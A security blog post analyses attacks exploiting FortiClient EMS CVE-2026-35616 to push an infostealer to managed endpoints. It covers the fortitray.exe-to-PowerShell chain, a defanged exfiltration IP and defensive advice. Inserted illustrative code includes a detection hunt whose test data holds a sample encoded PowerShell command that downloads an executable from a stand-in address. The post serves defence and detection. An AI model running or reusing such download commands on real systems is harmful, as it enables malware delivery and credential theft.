Tags: automation, forticlient-ems, cve-2026-35616, endpoint-security, living-off-the-land, arctic-wolf, pre-auth-api-bypass, management-server-attack

When Your Endpoint Manager Becomes the Attacker: Inside the FortiClient EMS CVE-2026-35616 Campaign

CVE-2026-35616 weaponizes FortiClient EMS to deploy malware fleet-wide. Inside the CVSS 9.1 pre-auth bypass exploited against managed enterprise endpoints.

Zyfolks Team

Endpoint management tools are supposed to be the immune system of a corporate network. This month, threat actors flipped that idea on its head — using FortiClient EMS itself as the delivery mechanism for a credential stealer disguised as a Fortinet patch. If the platform you trust to push updates becomes the platform pushing malware, your perimeter isn’t your firewall anymore. It’s whoever holds the management console.

Arctic Wolf disclosed in late May 2026 that attackers are actively weaponizing CVE-2026-35616, a critical pre-authentication API bypass in FortiClient Endpoint Management Server, to silently fan malicious PowerShell out to every managed endpoint. The flaw carries a CVSS score of 9.1 and was patched by Fortinet in FortiClient EMS 7.4.7. The campaign is a textbook case of why the security industry’s obsession with endpoint agents has created a new class of single points of failure.

Why a Management Server Bug Is Worse Than a Workstation Bug

According to Arctic Wolf, CVE-2026-35616 is a pre-authentication API access bypass that leads to privilege escalation. Once exploited, attackers modify EMS configurations — including deferring firmware upgrade reminders and tampering with Remote Access Profile settings and endpoint policy — to inject a malicious script into the normal management flow.

The bug itself isn’t the issue; it’s where it sits. Endpoint management servers sit above individual workstations in the trust hierarchy. A typical RCE on a laptop compromises one user. An RCE on the system that controls every laptop compromises the fleet. As Arctic Wolf put it, “every managed endpoint became a potential execution target without requiring a separate intrusion path to each device.”

If you’re a mid-sized enterprise with a few thousand EMS-managed endpoints, this means a single unpatched server is operationally equivalent to a few thousand simultaneous intrusions — without any of them tripping the lateral-movement detections your SOC is tuned for. The traffic looks like management traffic, because it is management traffic.

The take: vendor management consoles are going to become the most heavily targeted asset class of 2026 and 2027. They’re internet-adjacent, they’re privileged, and they’re often under-monitored because security teams treat them as infrastructure rather than as attack surface.

How the Attack Chain Turns Trusted Binaries Against You

The execution chain Arctic Wolf documented is a clinic in living-off-the-land. After exploiting the EMS API, attackers use fortitray.exe — a legitimate FortiClient executable — to launch a .cmd script via cmd.exe. The script then invokes a Base64-encoded PowerShell payload that downloads the malware, runs it, and exfiltrates results to 83.138.53[.]110 over an HTTP POST.

This matters because almost every detection engineer has spent the past five years writing rules to flag suspicious PowerShell, suspicious cmd.exe invocations, and suspicious child processes of Office. Very few have written rules for suspicious child processes of fortitray.exe. Trusted vendor binaries are an allowlist blind spot, and adversaries know it.

Imagine you’re running an EDR that auto-tunes itself based on prevalence. A FortiClient binary launching cmd.exe will show up as common across your fleet — because FortiClient is, by definition, common across your fleet. The behavior gets baselined as normal before anyone notices it shouldn’t be. That’s the entire game.

The take: behavioral baselining is going to need a new tier specifically for security-vendor binaries, because attackers have figured out that “trusted parent process” is the cheapest bypass on the market.

What the EKZ Infostealer Actually Steals

The payload itself — FortiEndpoint_Patch.exe — is, per Arctic Wolf, a previously unreported Windows information stealer. It harvests passwords, cookies, autofill data, credit card information, addresses, and phone numbers from Chromium- and Gecko-based browsers, writes the haul to a log file in ProgramData, and relies on the dropper PowerShell script to send everything to the attacker-controlled IP. The stealer itself has no network exfiltration capability, which keeps the binary’s own behavior boring enough to dodge network-based detections on the endpoint.

The real risk isn’t the credit card data. It’s the session cookies. Arctic Wolf explicitly warns that “session cookies and saved browser credentials may provide threat actors with follow-on access to cloud services, internal applications, and other authenticated resources, including cases where session reuse may circumvent MFA prompts.”

If you’re a security team that spent the past three years rolling out MFA on every SaaS app and feeling good about it, this is the part that should sting. Stolen session tokens replay through your IdP without triggering a second factor. The attacker doesn’t need your password — they have your already-authenticated session. This is the same primitive that’s been hitting industries where regulated access matters most, from finance to healthcare platforms handling patient records, where a single replayed session can blow open data sets that should never leave a controlled environment.

The take: token theft is the new password theft, and any security team still measuring “MFA coverage” instead of “session lifetime and binding” is fighting the last war.
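As an added illustration of the "session lifetime and binding" posture argued for above (example code, not any IdP's implementation), a server-side session store that rejects a replayed cookie on lifetime or on device binding. The 15-minute TTL, the session dictionary and the two binding inputs (a TLS-derived value and a device-key thumbprint) are assumptions standing in for whatever device-bound material a deployment actually has.

```python
import hashlib
import hmac
import secrets

# Assumed parameters: a short lifetime and an in-memory store keyed by the opaque cookie value.
SESSION_TTL_SECONDS = 15 * 60
_SESSIONS = {}  # cookie value -> session record

def device_binding(tls_exporter: bytes, device_key_thumbprint: str) -> str:
    # Bind to material that a browser-profile infostealer cannot copy out along with the cookie:
    # a TLS-derived exporter value plus the thumbprint of a device-held key (both assumed inputs).
    return hashlib.sha256(tls_exporter + device_key_thumbprint.encode()).hexdigest()

def issue_session(user: str, tls_exporter: bytes, device_key_thumbprint: str, now: float) -> str:
    token = secrets.token_urlsafe(32)
    _SESSIONS[token] = {"user": user, "issued": now,
                        "binding": device_binding(tls_exporter, device_key_thumbprint)}
    return token

def validate_session(token: str, tls_exporter: bytes, device_key_thumbprint: str, now: float):
    """Return (accepted, reason); a stolen cookie fails on lifetime or on binding, never passes as 'valid'."""
    rec = _SESSIONS.get(token)
    if rec is None:
        return False, "unknown token"
    if now - rec["issued"] > SESSION_TTL_SECONDS:
        _SESSIONS.pop(token, None)  # drop expired sessions so they cannot be revived later
        return False, "expired"
    if not hmac.compare_digest(rec["binding"], device_binding(tls_exporter, device_key_thumbprint)):
        _SESSIONS.pop(token, None)  # binding mismatch is a replay signal: revoke (and alert on it)
        return False, "device binding mismatch"
    return True, "ok"
```

Presenting the same token from a different device revokes it, so the legitimate user is forced through a fresh MFA login, which is the signal the page says teams should be measuring.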

What Engineering and Security Teams Should Actually Do This Week

The immediate action is obvious: upgrade to FortiClient EMS 7.4.7 or later. But the more interesting work is structural. Treat EMS — and every other privileged management console — like a tier-zero asset. Restrict its API surface to known administrative networks. Alert on any configuration change to Remote Access Profiles or endpoint policy that wasn’t ticketed. Hunt for fortitray.exe spawning cmd.exe or PowerShell across your fleet.
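The fortitray.exe hunt from the paragraph above, and the "trusted parent process" blind spot described earlier, as an added example that is not code from Arctic Wolf, Fortinet or this blog: it runs over constructed Sysmon-style process-creation records, flags any shell whose parent is fortitray.exe regardless of how common fortitray.exe is in the fleet, and walks the shell's subtree to decode a PowerShell -EncodedCommand payload (Base64 of UTF-16LE). The host names, PIDs, the payload text and the address 198.51.100.7 are all constructed.

```python
import base64
import re

# Vendor parents that are benign in normal operation but should never spawn a shell.
VENDOR_PARENTS = {"fortitray.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell's -EncodedCommand (short forms -e/-ec/-enc) takes Base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed Sysmon-style process-creation records, not telemetry from the Arctic Wolf report:
# WS01 carries the chain described above, WS02 is a clean baseline; payload and 198.51.100.7 are made up.
PAYLOAD = "Invoke-WebRequest http://198.51.100.7/p -OutFile $env:ProgramData\\x.exe"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    {"host": "WS01", "pid": 4100, "ppid": 900, "image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe"},
    {"host": "WS01", "pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"host": "WS01", "pid": 4130, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS02", "pid": 5100, "ppid": 900, "image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand payload, or None when absent or not valid UTF-16LE Base64."""
    match = ENC_FLAG.search(cmdline or "")
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le") if match else None
    except (ValueError, UnicodeDecodeError):
        return None

def hunt_vendor_shell_chains(events):
    """Flag shells whose parent is a trusted vendor binary; walk their subtree for encoded PowerShell."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        parent = by_key.get((e["host"], e["ppid"]))
        if parent is None or basename(parent["image"]) not in VENDOR_PARENTS or basename(e["image"]) not in SHELLS:
            continue
        finding = {"host": e["host"], "parent": basename(parent["image"]), "shell": basename(e["image"]), "decoded": None}
        stack = [e]  # depth-first walk of the flagged shell's subtree (index by ppid for real event volumes)
        while stack:
            cur = stack.pop()
            finding["decoded"] = finding["decoded"] or decode_encoded_command(cur.get("cmdline"))
            stack.extend(c for c in events if c["host"] == cur["host"] and c["ppid"] == cur["pid"])
        findings.append(finding)
    return findings
```

Because the match key is the parent image rather than prevalence, the WS02 baseline host produces nothing while WS01 is flagged even though fortitray.exe is present on both.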

For anyone building or buying software where audit trails are non-negotiable — supply chain platforms, healthcare records, financial systems — the integrity of administrative changes deserves the same scrutiny as the data those changes affect. The attackers in this case didn’t just compromise endpoints; they rewrote policy. If your platform can’t tell you who changed what, when, and whether the change matched a legitimate workflow, you’re one CVE away from being in Arctic Wolf’s next writeup.

FAQ

Q: What is CVE-2026-35616?
A: CVE-2026-35616 is a critical pre-authentication API access bypass in FortiClient Endpoint Management Server with a CVSS score of 9.1. Successful exploitation lets an unauthenticated attacker escalate privileges and modify EMS configuration, which can then be used to push commands to every managed endpoint. Fortinet patched it in FortiClient EMS 7.4.7.

Q: How do attackers deliver malware through FortiClient EMS?
A: According to Arctic Wolf, attackers exploit the API bypass to modify Remote Access Profiles and endpoint policy, inserting a malicious script that executes through FortiClient’s own management pathway. They then use the legitimate fortitray.exe binary to launch cmd.exe, which runs a Base64-encoded PowerShell script that downloads an information stealer disguised as FortiEndpoint_Patch.exe.

Q: Why is session cookie theft a bigger deal than password theft?
A: Session cookies represent an already-authenticated user, so replaying them often bypasses MFA prompts entirely. Arctic Wolf notes that stolen cookies can grant follow-on access to cloud services and internal applications, even where MFA is enforced for fresh logins. That makes session token theft a more reliable path to lateral movement than credential phishing.

Key Takeaways

  • Treat every privileged management console — EMS, MDM, RMM, CI/CD — as a tier-zero asset with its own dedicated monitoring, not as background infrastructure.
  • Build detections specifically for trusted security-vendor binaries spawning shells; allowlisting parent processes is now an attacker technique, not a defender shortcut.
  • Shift your authentication posture from “MFA coverage” to short-lived, device-bound sessions, because infostealers are turning cookie theft into MFA-bypass-as-a-service.
  • Alert on configuration changes to endpoint policies and remote access profiles the same way you alert on changes to firewall rules — they’re equivalent in blast radius.
  • Expect more campaigns in 2026 that exploit endpoint management platforms as a fan-out mechanism; one server breach scaling to thousands of managed endpoints is too good an ROI to pass up.
